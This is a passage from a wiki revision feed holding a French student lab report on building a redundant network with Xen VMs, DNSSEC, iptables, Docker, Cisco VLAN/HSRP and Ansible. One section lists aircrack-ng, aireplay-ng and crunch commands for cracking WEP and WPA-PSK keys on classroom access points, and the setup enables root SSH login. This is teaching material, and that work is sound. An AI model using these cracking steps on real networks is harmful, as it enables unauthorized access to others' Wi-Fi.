 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52003</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52003"/>
				<updated>2020-01-05T13:01:57Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration Générale */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
